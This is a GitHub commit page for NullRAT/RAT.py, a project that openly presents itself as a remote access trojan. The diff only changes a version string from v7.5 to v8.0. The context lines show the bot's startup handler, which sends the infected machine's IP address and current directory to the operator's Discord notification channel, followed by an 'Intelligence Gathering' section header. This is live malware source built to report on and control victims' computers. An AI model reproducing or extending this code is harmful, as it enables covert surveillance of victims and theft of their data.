Skip to content

Commit eff221f

Browse files
authored
v8.0
1 parent 57f986d commit eff221f

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

NullRAT/RAT.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,7 @@
1717
@client.event
1818
async def on_ready():
1919
await client.get_channel(notification_channel).send(
20-
embed=Embed(title = f"NullRAT v7.5 started on {IP()}\nCurrently present in {original_dir}")
20+
embed=Embed(title = f"NullRAT v8.0 started on {IP()}\nCurrently present in {original_dir}")
2121
)
2222

2323
# Intelligence Gathering #

0 commit comments

Comments
 (0)